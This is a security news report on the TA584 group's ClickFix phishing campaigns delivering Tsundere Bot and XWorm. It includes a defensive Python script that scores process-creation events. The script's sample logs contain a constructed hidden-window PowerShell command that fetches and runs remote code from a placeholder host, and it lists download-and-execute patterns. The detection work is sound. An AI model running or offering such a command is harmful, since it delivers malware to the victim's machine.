TA584 Uses Tsundere Bot and XWorm in ClickFix Campaigns, Increasing Ransomware Risk


Friday, January 30, 2026

Researchers at Proofpoint have observed increased activity from TA584, an Initial Access Broker (IAB) group that significantly expanded its operations in late 2025. The group reportedly tripled its campaign volume, broadening its targeting beyond North America and the United Kingdom to include Germany, other European countries, and Australia. TA584 has been using Tsundere Bot in combination with XWorm to compromise systems, and these infections are believed to potentially lead to follow-on ransomware attacks.

The attack chain begins with phishing emails sent through legitimate services such as SendGrid or Amazon SES. After victims click the embedded link and pass IP checks or geofencing, they are redirected to a CAPTCHA page, followed by a “ClickFix” social-engineering page that displays fake error messages. Victims are tricked into copying and executing PowerShell commands themselves. These commands download and execute scripts that install Tsundere Bot or XWorm directly in memory. TA584 has previously deployed a range of payloads, including Ursnif, Cobalt Strike, and WarmCookie.
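The chain above ends with a victim pasting an interpreter command into the Run dialog, which is the step a defender can see in process-creation telemetry. The following is an added detection sketch, not code from Proofpoint or from the actors described; it scores constructed Sysmon-style Event ID 1 records (field names `Image`, `ParentImage`, `CommandLine` are assumed to follow Sysmon) for the combination the article describes: an interpreter spawned by explorer.exe and a command line that fetches and runs a script in memory. The log lines and the `example.invalid` hostnames are constructed for the example.

```python
"""ClickFix-style execution detector (added example, not the original page's code).

Scores constructed Sysmon Event ID 1 records: an interpreter launched from
explorer.exe (what the Run dialog produces) plus command-line markers for
download-and-execute behaviour. Field names are assumed to follow Sysmon.
"""
import json
import re
from typing import Iterable

# Interpreters a ClickFix lure typically asks the victim to launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line fragments indicating "download and run in memory" behaviour.
DOWNLOAD_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\biex\b",
    r"invoke-expression",
    r"invoke-webrequest",
    r"\biwr\b",
    r"downloadstring",
    r"\bcurl\b",
    r"\bwget\b",
    r"-enc(odedcommand)?\b",
    r"-w(indowstyle)?\s+hidden",
)]

# Constructed sample telemetry (JSON lines); hostnames are placeholders.
SAMPLE_LOG = r"""
{"RecordId": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iex (iwr http://example.invalid/verify)\""}
{"RecordId": 2, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}
{"RecordId": 3, "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps\\WindowsTerminal.exe", "CommandLine": "pwsh -c \"Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile tool.zip\""}
{"RecordId": 4, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe readme.txt"}
"""


def parse_events(log_text: str) -> list[dict]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons). Explorer parent counts 1; each marker counts 1."""
    reasons: list[str] = []
    if basename(event.get("Image", "")) not in INTERPRETERS:
        return 0, reasons
    score = 0
    if basename(event.get("ParentImage", "")) == "explorer.exe":
        score += 1
        reasons.append("interpreter spawned by explorer.exe (Run dialog / shell)")
    cmdline = event.get("CommandLine", "")
    hits = [p.pattern for p in DOWNLOAD_PATTERNS if p.search(cmdline)]
    if hits:
        score += len(hits)
        reasons.append("download/in-memory execution markers: " + ", ".join(hits))
    return score, reasons


def find_clickfix_candidates(events: Iterable[dict], threshold: int = 2) -> list[dict]:
    """Flag events whose score meets the threshold.

    A plain interactive PowerShell launch (explorer parent, no markers) scores 1
    and is not flagged; an explorer-spawned interpreter with any download marker,
    or any interpreter with two or more markers, is.
    """
    findings = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append({"RecordId": ev.get("RecordId"), "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_clickfix_candidates(parse_events(SAMPLE_LOG)):
        print(finding)
```

Run stand-alone, only record 1 is reported (explorer.exe parent plus hidden window, `iex` and `iwr` markers); the interactive PowerShell launch and the administrator's terminal download each score 1 and stay below the threshold. In production the same scoring would sit on top of EDR or Sysmon process-creation events, and the explorer.exe parent check can be corroborated with the RunMRU registry value written by the Run dialog.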

Tsundere Bot is a Malware-as-a-Service (MaaS) offering that functions as both a backdoor and a loader, leveraging Node.js for execution. It can collect detailed system information for host profiling and turn infected machines into SOCKS proxies. The malware also retrieves its command-and-control (C2) addresses from the Ethereum blockchain using the EtherHiding technique to evade detection. Additionally, it checks the system language and terminates on hosts in CIS countries, and its platform includes a “bot marketplace”-style infrastructure.

Source: https://www.bleepingcomputer.com/news/security/initial-access-hackers-switch-to-tsundere-bot-for-ransomware-attacks/